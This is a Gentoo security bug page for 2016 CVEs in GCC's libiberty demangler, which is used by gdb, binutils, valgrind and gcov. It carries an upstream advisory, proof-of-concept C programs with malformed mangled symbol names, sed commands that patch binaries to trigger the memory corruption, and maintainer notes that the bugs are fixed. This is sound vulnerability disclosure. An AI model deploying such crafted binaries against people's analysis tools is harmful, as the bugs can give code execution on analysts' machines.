Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 582240 (CVE-2016-2226, CVE-2016-4487, CVE-2016-4488, CVE-2016-4489, CVE-2016-4490) - sys-devel/gcc: multiple vulnerabilities
Summary: sys-devel/gcc: multiple vulnerabilities
Status: RESOLVED FIXED
Alias: CVE-2016-2226, CVE-2016-4487, CVE-2016-4488, CVE-2016-4489, CVE-2016-4490
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: Normal major (vote)
Assignee: Gentoo Security
URL: http://www.openwall.com/lists/oss-sec...
Whiteboard: A2 [cve]
Keywords:
: 599802 (view as bug list)
Depends on:
Blocks:
 
Reported: 2016-05-06 08:51 UTC by Agostino Sarubbo
Modified: 2019-03-11 03:21 UTC (History)
1 user (show)

See Also:
Package list:
Runtime testing required: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Agostino Sarubbo gentoo-dev 2016-05-06 08:51:50 UTC
From ${URL} :

Attack Vector 1: Security researchers using binary analysis tools, such as Valgrind, GDB, Binutils (e.g., objdump, nm, ..), Gcov, or other LibBFD-based tools on untrusted binaries are vulnerable to arbitrary code execution through several vulnerabilities in 
Libiberty, the GNU demangling library maintained by GCC. An attacker might modify a program binary such that it executes malicious code upon *analysis* (e.g., an analysis to identify whether the binary is malicious in the first place). 

Attack Vector 2: Remote access / DoS via Online IDEs or demangling services.

Workaround: Until the patches propagate to the vulnerable tools, switch off default demangling! E.g.,
$ echo "set demangle-style none"  >>  ~/.gdbinit
$ echo "--demangle=no" >> ~/.valgrindrc

Details and reproducers in the bug reports:

1) Exploitable Buffer Overflow (Fixed in GCC trunk)
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=69687

2) Invalid Write due to a Use-After-Free (Fixed in GCC trunk)
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=70481

3) Invalid Write due to Integer Overflow (Fixed in GCC trunk)
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=70492

4) Write Access Violation (Fixed in GCC trunk)
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=70498

5) Various Stack Corruptions (Patch under Review)
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=70909
https://gcc.gnu.org/ml/gcc-patches/2016-05/threads.html#00105

6) Write Access Violation (Patch under Review)
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=70926
https://gcc.gnu.org/ml/gcc-patches/2016-05/threads.html#00223

These vulnerabilities have been found with a more efficient version of the AFL fuzzer.
A recent 12h fuzzing session on the patched version did not reveal any more security critical bugs in the demangling library.

POC for PR69687
========================

** GDB and BINUTILS
$ cat comileme.c
#include <stdio.h>
const char *__020A___________________X00020A___R0020A__U000R03000N99999999_020A__K000="Hello World";
int main() {
  printf("%s\n",__020A___________________X00020A___R0020A__U000R03000N99999999_020A__K000);
}
$ g++ compileme.c -o compileme
$ ./compileme
Hello World!
$ gdb ./compileme
..
$ objdump -x -C ./compileme
..
$ nm -C ./compileme
..

** VALGRIND + GCOV:
$ cat compilemetoo.c
#include<stdio.h>
#include<stdlib.h>

const char* ____________________X00020A___R0020A__U000R03000N99999999_020A__K000(){
  char *p;
  p = (char *) malloc(19);
  p = (char *) malloc(12);
  free(p);
  p = (char *) malloc(16);
  return "Hello World!";
}

int main()
{
   printf("%s\n",____________________X00020A___R0020A__U000R03000N99999999_020A__K000());
   return 0;
}

$ g++ compilemetoo.c -o compilemetoo
$ sed -bi s/Z68/_20/g compilemetoo
$ chmod u+x compilemetoo
$ ./compilemetoo
Hello World!
$ valgrind --leak-check=yes ./compilemetoo
..

GCOV:
$ g++ -fprofile-arcs -ftest-coverage compilemetoo.c -o compilemetoo
$ sed -bi s/Z68/_20/g compilemetoo
$ sed -bi s/Z68/_20/g compilemetoo.gcda
$ ./compilemetoo
Hello World!
$ gcov --version
gcov (GCC) 7.0.0
$ gcov -mf compilemetoo
..



@maintainer(s): after the bump, in case we need to stabilize the package, please let us know if it is ready for the stabilization or not.
Comment 1 Anthony Basile gentoo-dev 2016-05-06 16:25:40 UTC
Its good to know about these and that a fix is coming down the pipeline, but you really shouldn't expect much security from gcc or binutils themselves.  Now the binaries the produce is a different story.
Comment 2 Thomas Deutschmann (RETIRED) gentoo-dev 2016-11-15 15:27:23 UTC
*** Bug 599802 has been marked as a duplicate of this bug. ***
Comment 4 Christopher Díaz Riveros (RETIRED) gentoo-dev Security 2017-07-11 00:58:41 UTC
UPDATE:

All CVEs reported FIXED by upstream
Comment 5 Andreas K. Hüttel archtester gentoo-dev 2017-12-09 20:40:51 UTC
> 
> 1) Exploitable Buffer Overflow (Fixed in GCC trunk)
> https://gcc.gnu.org/bugzilla/show_bug.cgi?id=69687

Fixed upstream in 4.9.4, 5.4, 6.1 and later, 7.1 and later
-> all unmasked versions in Gentoo fixed

> 
> 2) Invalid Write due to a Use-After-Free (Fixed in GCC trunk)
> https://gcc.gnu.org/bugzilla/show_bug.cgi?id=70481

Fixed upstream in 4.9.4, 5.4, 6.1 and later, 7.1 and later

> 
> 3) Invalid Write due to Integer Overflow (Fixed in GCC trunk)
> https://gcc.gnu.org/bugzilla/show_bug.cgi?id=70492

Fixed upstream in 4.9.4, 5.4, 6.1 and later, 7.1 and later

> 
> 4) Write Access Violation (Fixed in GCC trunk)
> https://gcc.gnu.org/bugzilla/show_bug.cgi?id=70498

Fixed upstream in 4.9.4, 5.4, 6.2 and later, 7.1 and later

> 
> 5) Various Stack Corruptions (Patch under Review)
> https://gcc.gnu.org/bugzilla/show_bug.cgi?id=70909
> https://gcc.gnu.org/ml/gcc-patches/2016-05/threads.html#00105

Fixed upstream in 7.1 and later

> 
> 6) Write Access Violation (Patch under Review)
> https://gcc.gnu.org/bugzilla/show_bug.cgi?id=70926
> https://gcc.gnu.org/ml/gcc-patches/2016-05/threads.html#00223

Fixed upstream in 7.1 and later
Comment 6 Andreas K. Hüttel archtester gentoo-dev 2017-12-17 22:43:16 UTC
Splitting out 5 and 6 into a separate bug so we can proceed here.

> > 
> > 1) Exploitable Buffer Overflow (Fixed in GCC trunk)
> > https://gcc.gnu.org/bugzilla/show_bug.cgi?id=69687
> 
> Fixed upstream in 4.9.4, 5.4, 6.1 and later, 7.1 and later
> -> all unmasked versions in Gentoo fixed
> 
> > 
> > 2) Invalid Write due to a Use-After-Free (Fixed in GCC trunk)
> > https://gcc.gnu.org/bugzilla/show_bug.cgi?id=70481
> 
> Fixed upstream in 4.9.4, 5.4, 6.1 and later, 7.1 and later
> 
> > 
> > 3) Invalid Write due to Integer Overflow (Fixed in GCC trunk)
> > https://gcc.gnu.org/bugzilla/show_bug.cgi?id=70492
> 
> Fixed upstream in 4.9.4, 5.4, 6.1 and later, 7.1 and later
> 
> > 
> > 4) Write Access Violation (Fixed in GCC trunk)
> > https://gcc.gnu.org/bugzilla/show_bug.cgi?id=70498
> 
> Fixed upstream in 4.9.4, 5.4, 6.2 and later, 7.1 and later
> 

All unmasked versions are fixed. No further cleanup (toolchain package).
Please proceed. Toolchain out.